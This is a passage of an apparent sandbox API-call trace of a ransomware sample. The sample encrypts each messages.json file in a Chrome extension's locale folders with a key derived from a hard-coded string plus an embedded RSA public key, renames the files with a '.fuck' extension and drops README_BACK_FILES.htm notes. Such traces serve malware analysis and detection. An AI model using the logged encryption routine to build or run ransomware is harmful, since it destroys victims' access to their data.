KEY-----MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCn7fL/1qsWkJkUtXKZIJNqYfnVByVhK/LzQecPhVR7r+4ng1nZBxg44SexS63iYlnodqDWkH/Hi82Uc0UmugY/Ow39uEGeoiYqWl5BLM8pfRAGqzxbh600Qd/Oc5kYdg8hP0D/gAHXwutL74fygpB6xb8EZl2BHKvpDR80GYFlrQIDAQAB-----END PUBLIC KEY-----i", cchString=0x0, dwFlags=0x0, pbBinary=0x2b9bc60, pcbBinary=0x2b9bc40, pdwSkip=0x0, pdwFlags=0x0 | out: pbBinary=0x2b9bc60, pcbBinary=0x2b9bc40, pdwSkip=0x0, pdwFlags=0x0) returned 1 [0259.585] CryptDecodeObjectEx (in: dwCertEncodingType=0x1, lpszStructType=0x8, pbEncoded=0x2b9bc60, cbEncoded=0xa2, dwFlags=0x8000, pDecodePara=0x0, pvStructInfo=0x2b9bc34, pcbStructInfo=0x2b9bc3c | out: pvStructInfo=0x2b9bc34, pcbStructInfo=0x2b9bc3c) returned 1 [0259.585] CryptAcquireContextA (in: phProv=0x2b9bc50, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2b9bc50*=0x2e6da10) returned 1 [0259.586] CryptImportPublicKeyInfo (in: hCryptProv=0x2e6da10, dwCertEncodingType=0x1, pInfo=0x2e27f50*(Algorithm.pszObjId="1.2.840.113549.1.1.1", Algorithm.Parameters.cbData=0x2, Algorithm.Parameters.pbData=0x2e27f80*, PublicKey.cbData=0x8c, PublicKey.pbData=0x2e27f88*, PublicKey.cUnusedBits=0x0), phKey=0x2b9bc48 | out: phKey=0x2b9bc48*=0x2e7cc80) returned 1 [0259.586] CryptEncrypt (in: hKey=0x2e7cc80, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x2b9bc38*=0x18, dwBufLen=0x18 | out: pbData=0x0*, pdwDataLen=0x2b9bc38*=0x80) returned 1 [0259.586] CryptEncrypt (in: hKey=0x2e7cc80, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2e6ddc8*, pdwDataLen=0x2b9bc4c*=0x18, dwBufLen=0x80 | out: pbData=0x2e6ddc8*, pdwDataLen=0x2b9bc4c*=0x80) returned 1 [0259.586] WriteFile (in: hFile=0x5d60, lpBuffer=0x2e6ddc8*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x2e6ddc8*, lpNumberOfBytesWritten=0x2b9bc5c*=0x80, lpOverlapped=0x0) returned 1 [0259.587] ReadFile (in: hFile=0x5d5c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9bc5c*=0x29a, lpOverlapped=0x0) returned 1 [0259.588] CryptEncrypt (in: hKey=0x2e7c7c0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9bc5c*=0x29a, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9bc5c*=0x2a0) returned 1 [0259.588] WriteFile (in: hFile=0x5d60, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x2a0, lpNumberOfBytesWritten=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9bc5c*=0x2a0, lpOverlapped=0x0) returned 1 [0259.601] CloseHandle (hObject=0x5d5c) returned 1 [0259.601] CloseHandle (hObject=0x5d60) returned 1 [0259.602] CopyFileA (lpExistingFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\pl\\messages.json.gsg" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\pl\\messages.json.gsg"), lpNewFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\pl\\messages.json" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\pl\\messages.json"), bFailIfExists=0) returned 1 [0259.604] SetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\pl\\messages.json", dwFileAttributes=0x0) returned 1 [0259.605] DeleteFileA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\pl\\messages.json.gsg" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\pl\\messages.json.gsg")) returned 1 [0259.606] MoveFileA (lpExistingFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\pl\\messages.json" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\pl\\messages.json"), lpNewFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\pl\\messages.json.fuck" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\pl\\messages.json.fuck")) returned 1 [0259.607] CryptDestroyHash (hHash=0x2e7fd40) returned 1 [0259.607] CryptDestroyKey (hKey=0x2e7c7c0) returned 1 [0259.607] CryptReleaseContext (hProv=0x2e7b4f0, dwFlags=0x0) returned 1 [0259.607] FindNextFileA (in: hFindFile=0x2e7fc40, lpFindFileData=0x2b9cd48 | out: lpFindFileData=0x2b9cd48) returned 0 [0259.607] FindClose (in: hFindFile=0x2e7fc40 | out: hFindFile=0x2e7fc40) returned 1 [0259.607] GetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\pl\\README_BACK_FILES.htm" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\pl\\readme_back_files.htm")) returned 0xffffffff [0259.607] AreFileApisANSI () returned 1 [0259.607] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x2e4030, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 157 [0259.607] CreateFileW (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\pl\\README_BACK_FILES.htm" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\pl\\readme_back_files.htm"), dwDesiredAccess=0x40000000, dwShareMode=0x3, lpSecurityAttributes=0x2b9cecc, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5d64 [0259.608] GetFileType (hFile=0x5d64) returned 0x1 [0259.608] WriteFile (in: hFile=0x5d64, lpBuffer=0x2b9bb18*, nNumberOfBytesToWrite=0x5ec, lpNumberOfBytesWritten=0x2b9bb10, lpOverlapped=0x0 | out: lpBuffer=0x2b9bb18*, lpNumberOfBytesWritten=0x2b9bb10*=0x5ec, lpOverlapped=0x0) returned 1 [0259.609] FindNextFileA (in: hFindFile=0x2e7fc00, lpFindFileData=0x2b9d0e4 | out: lpFindFileData=0x2b9d0e4) returned 1 [0259.609] FindFirstFileA (in: lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\pt_BR\\*.*", lpFindFileData=0x2b9cd48 | out: lpFindFileData=0x2b9cd48) returned 0x2e7fc40 [0259.609] FindNextFileA (in: hFindFile=0x2e7fc40, lpFindFileData=0x2b9cd48 | out: lpFindFileData=0x2b9cd48) returned 1 [0259.610] FindNextFileA (in: hFindFile=0x2e7fc40, lpFindFileData=0x2b9cd48 | out: lpFindFileData=0x2b9cd48) returned 1 [0259.610] GetSystemTimePreciseAsFileTime (in: lpSystemTimeAsFileTime=0x2b9cc58 | out: lpSystemTimeAsFileTime=0x2b9cc58) [0259.610] GetLastError () returned 0x0 [0259.610] GetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\pt_BR\\messages.json" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\pt_br\\messages.json")) returned 0x20 [0259.610] SetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\pt_BR\\messages.json", dwFileAttributes=0x80) returned 1 [0259.611] CreateFileA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\pt_BR\\messages.json" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\pt_br\\messages.json"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5d60 [0259.611] CreateFileA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\pt_BR\\messages.json.gsg" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\pt_br\\messages.json.gsg"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5d5c [0259.612] SetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\pt_BR\\messages.json.gsg", dwFileAttributes=0x2) returned 1 [0259.613] CryptAcquireContextA (in: phProv=0x2b9bc54, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0x0 | out: phProv=0x2b9bc54*=0x2e7b4f0) returned 1 [0259.614] CryptCreateHash (in: hProv=0x2e7b4f0, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x2b9bc58 | out: phHash=0x2b9bc58) returned 1 [0259.615] lstrlenA (lpString="QPmjqALrRVCjmscVAzZjjQwqzMlQm") returned 29 [0259.615] CryptHashData (hHash=0x2e7fd40, pbData=0x28cb4e0, dwDataLen=0x1d, dwFlags=0x0) returned 1 [0259.615] CryptDeriveKey (in: hProv=0x2e7b4f0, Algid=0x6610, hBaseData=0x2e7fd40, dwFlags=0x1000000, phKey=0x2b9bc44 | out: phKey=0x2b9bc44*=0x2e7c7c0) returned 1 [0259.615] CryptStringToBinaryA (in: pszString="-----BEGIN PUBLIC KEY-----MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCn7fL/1qsWkJkUtXKZIJNqYfnVByVhK/LzQecPhVR7r+4ng1nZBxg44SexS63iYlnodqDWkH/Hi82Uc0UmugY/Ow39uEGeoiYqWl5BLM8pfRAGqzxbh600Qd/Oc5kYdg8hP0D/gAHXwutL74fygpB6xb8EZl2BHKvpDR80GYFlrQIDAQAB-----END PUBLIC KEY-----i", cchString=0x0, dwFlags=0x0, pbBinary=0x2b9bc60, pcbBinary=0x2b9bc40, pdwSkip=0x0, pdwFlags=0x0 | out: pbBinary=0x2b9bc60, pcbBinary=0x2b9bc40, pdwSkip=0x0, pdwFlags=0x0) returned 1 [0259.615] CryptDecodeObjectEx (in: dwCertEncodingType=0x1, lpszStructType=0x8, pbEncoded=0x2b9bc60, cbEncoded=0xa2, dwFlags=0x8000, pDecodePara=0x0, pvStructInfo=0x2b9bc34, pcbStructInfo=0x2b9bc3c | out: pvStructInfo=0x2b9bc34, pcbStructInfo=0x2b9bc3c) returned 1 [0259.615] CryptAcquireContextA (in: phProv=0x2b9bc50, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2b9bc50*=0x2e6de50) returned 1 [0259.615] CryptImportPublicKeyInfo (in: hCryptProv=0x2e6de50, dwCertEncodingType=0x1, pInfo=0x2e289e0*(Algorithm.pszObjId="1.2.840.113549.1.1.1", Algorithm.Parameters.cbData=0x2, Algorithm.Parameters.pbData=0x2e28a10*, PublicKey.cbData=0x8c, PublicKey.pbData=0x2e28a18*, PublicKey.cUnusedBits=0x0), phKey=0x2b9bc48 | out: phKey=0x2b9bc48*=0x2e7cd80) returned 1 [0259.615] CryptEncrypt (in: hKey=0x2e7cd80, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x2b9bc38*=0x18, dwBufLen=0x18 | out: pbData=0x0*, pdwDataLen=0x2b9bc38*=0x80) returned 1 [0259.615] CryptEncrypt (in: hKey=0x2e7cd80, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2e6ded8*, pdwDataLen=0x2b9bc4c*=0x18, dwBufLen=0x80 | out: pbData=0x2e6ded8*, pdwDataLen=0x2b9bc4c*=0x80) returned 1 [0259.615] WriteFile (in: hFile=0x5d5c, lpBuffer=0x2e6ded8*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x2e6ded8*, lpNumberOfBytesWritten=0x2b9bc5c*=0x80, lpOverlapped=0x0) returned 1 [0259.616] ReadFile (in: hFile=0x5d60, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9bc5c*=0x29b, lpOverlapped=0x0) returned 1 [0259.618] CryptEncrypt (in: hKey=0x2e7c7c0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9bc5c*=0x29b, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9bc5c*=0x2a0) returned 1 [0259.618] WriteFile (in: hFile=0x5d5c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x2a0, lpNumberOfBytesWritten=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9bc5c*=0x2a0, lpOverlapped=0x0) returned 1 [0259.625] CloseHandle (hObject=0x5d60) returned 1 [0259.625] CloseHandle (hObject=0x5d5c) returned 1 [0259.625] CopyFileA (lpExistingFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\pt_BR\\messages.json.gsg" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\pt_br\\messages.json.gsg"), lpNewFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\pt_BR\\messages.json" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\pt_br\\messages.json"), bFailIfExists=0) returned 1 [0259.628] SetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\pt_BR\\messages.json", dwFileAttributes=0x0) returned 1 [0259.628] DeleteFileA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\pt_BR\\messages.json.gsg" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\pt_br\\messages.json.gsg")) returned 1 [0259.629] MoveFileA (lpExistingFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\pt_BR\\messages.json" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\pt_br\\messages.json"), lpNewFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\pt_BR\\messages.json.fuck" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\pt_br\\messages.json.fuck")) returned 1 [0259.630] CryptDestroyHash (hHash=0x2e7fd40) returned 1 [0259.630] CryptDestroyKey (hKey=0x2e7c7c0) returned 1 [0259.630] CryptReleaseContext (hProv=0x2e7b4f0, dwFlags=0x0) returned 1 [0259.630] FindNextFileA (in: hFindFile=0x2e7fc40, lpFindFileData=0x2b9cd48 | out: lpFindFileData=0x2b9cd48) returned 0 [0259.630] FindClose (in: hFindFile=0x2e7fc40 | out: hFindFile=0x2e7fc40) returned 1 [0259.630] GetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\pt_BR\\README_BACK_FILES.htm" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\pt_br\\readme_back_files.htm")) returned 0xffffffff [0259.630] AreFileApisANSI () returned 1 [0259.630] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x2e3a48, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 160 [0259.630] CreateFileW (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\pt_BR\\README_BACK_FILES.htm" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\pt_br\\readme_back_files.htm"), dwDesiredAccess=0x40000000, dwShareMode=0x3, lpSecurityAttributes=0x2b9cecc, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5d64 [0259.631] GetFileType (hFile=0x5d64) returned 0x1 [0259.631] WriteFile (in: hFile=0x5d64, lpBuffer=0x2b9bb18*, nNumberOfBytesToWrite=0x5ec, lpNumberOfBytesWritten=0x2b9bb10, lpOverlapped=0x0 | out: lpBuffer=0x2b9bb18*, lpNumberOfBytesWritten=0x2b9bb10*=0x5ec, lpOverlapped=0x0) returned 1 [0259.632] FindNextFileA (in: hFindFile=0x2e7fc00, lpFindFileData=0x2b9d0e4 | out: lpFindFileData=0x2b9d0e4) returned 1 [0259.632] FindFirstFileA (in: lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\pt_PT\\*.*", lpFindFileData=0x2b9cd48 | out: lpFindFileData=0x2b9cd48) returned 0x2e7fc40 [0259.632] FindNextFileA (in: hFindFile=0x2e7fc40, lpFindFileData=0x2b9cd48 | out: lpFindFileData=0x2b9cd48) returned 1 [0259.632] FindNextFileA (in: hFindFile=0x2e7fc40, lpFindFileData=0x2b9cd48 | out: lpFindFileData=0x2b9cd48) returned 1 [0259.633] GetSystemTimePreciseAsFileTime (in: lpSystemTimeAsFileTime=0x2b9cc58 | out: lpSystemTimeAsFileTime=0x2b9cc58) [0259.633] GetLastError () returned 0x0 [0259.633] GetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\pt_PT\\messages.json" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\pt_pt\\messages.json")) returned 0x20 [0259.634] SetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\pt_PT\\messages.json", dwFileAttributes=0x80) returned 1 [0259.634] CreateFileA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\pt_PT\\messages.json" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\pt_pt\\messages.json"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5d5c [0259.635] CreateFileA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\pt_PT\\messages.json.gsg" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\pt_pt\\messages.json.gsg"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5d60 [0259.635] SetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\pt_PT\\messages.json.gsg", dwFileAttributes=0x2) returned 1 [0259.636] CryptAcquireContextA (in: phProv=0x2b9bc54, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0x0 | out: phProv=0x2b9bc54*=0x2e7b4f0) returned 1 [0259.638] CryptCreateHash (in: hProv=0x2e7b4f0, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x2b9bc58 | out: phHash=0x2b9bc58) returned 1 [0259.638] lstrlenA (lpString="QPmjqALrRVCjmscVAzZjjQwqzMlQm") returned 29 [0259.638] CryptHashData (hHash=0x2e7fd40, pbData=0x28cb670, dwDataLen=0x1d, dwFlags=0x0) returned 1 [0259.638] CryptDeriveKey (in: hProv=0x2e7b4f0, Algid=0x6610, hBaseData=0x2e7fd40, dwFlags=0x1000000, phKey=0x2b9bc44 | out: phKey=0x2b9bc44*=0x2e7c440) returned 1 [0259.638] CryptStringToBinaryA (in: pszString="-----BEGIN PUBLIC KEY-----MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCn7fL/1qsWkJkUtXKZIJNqYfnVByVhK/LzQecPhVR7r+4ng1nZBxg44SexS63iYlnodqDWkH/Hi82Uc0UmugY/Ow39uEGeoiYqWl5BLM8pfRAGqzxbh600Qd/Oc5kYdg8hP0D/gAHXwutL74fygpB6xb8EZl2BHKvpDR80GYFlrQIDAQAB-----END PUBLIC KEY-----i", cchString=0x0, dwFlags=0x0, pbBinary=0x2b9bc60, pcbBinary=0x2b9bc40, pdwSkip=0x0, pdwFlags=0x0 | out: pbBinary=0x2b9bc60, pcbBinary=0x2b9bc40, pdwSkip=0x0, pdwFlags=0x0) returned 1 [0259.638] CryptDecodeObjectEx (in: dwCertEncodingType=0x1, lpszStructType=0x8, pbEncoded=0x2b9bc60, cbEncoded=0xa2, dwFlags=0x8000, pDecodePara=0x0, pvStructInfo=0x2b9bc34, pcbStructInfo=0x2b9bc3c | out: pvStructInfo=0x2b9bc34, pcbStructInfo=0x2b9bc3c) returned 1 [0259.638] CryptAcquireContextA (in: phProv=0x2b9bc50, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2b9bc50*=0x2e6df60) returned 1 [0259.638] CryptImportPublicKeyInfo (in: hCryptProv=0x2e6df60, dwCertEncodingType=0x1, pInfo=0x2e28770*(Algorithm.pszObjId="1.2.840.113549.1.1.1", Algorithm.Parameters.cbData=0x2, Algorithm.Parameters.pbData=0x2e287a0*, PublicKey.cbData=0x8c, PublicKey.pbData=0x2e287a8*, PublicKey.cUnusedBits=0x0), phKey=0x2b9bc48 | out: phKey=0x2b9bc48*=0x2e7ca00) returned 1 [0259.638] CryptEncrypt (in: hKey=0x2e7ca00, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x2b9bc38*=0x18, dwBufLen=0x18 | out: pbData=0x0*, pdwDataLen=0x2b9bc38*=0x80) returned 1 [0259.638] CryptEncrypt (in: hKey=0x2e7ca00, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2e6dfe8*, pdwDataLen=0x2b9bc4c*=0x18, dwBufLen=0x80 | out: pbData=0x2e6dfe8*, pdwDataLen=0x2b9bc4c*=0x80) returned 1 [0259.639] WriteFile (in: hFile=0x5d60, lpBuffer=0x2e6dfe8*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x2e6dfe8*, lpNumberOfBytesWritten=0x2b9bc5c*=0x80, lpOverlapped=0x0) returned 1 [0259.639] ReadFile (in: hFile=0x5d5c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9bc5c*=0x295, lpOverlapped=0x0) returned 1 [0259.641] CryptEncrypt (in: hKey=0x2e7c440, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9bc5c*=0x295, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9bc5c*=0x2a0) returned 1 [0259.641] WriteFile (in: hFile=0x5d60, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x2a0, lpNumberOfBytesWritten=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9bc5c*=0x2a0, lpOverlapped=0x0) returned 1 [0259.644] CloseHandle (hObject=0x5d5c) returned 1 [0259.644] CloseHandle (hObject=0x5d60) returned 1 [0259.644] CopyFileA (lpExistingFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User 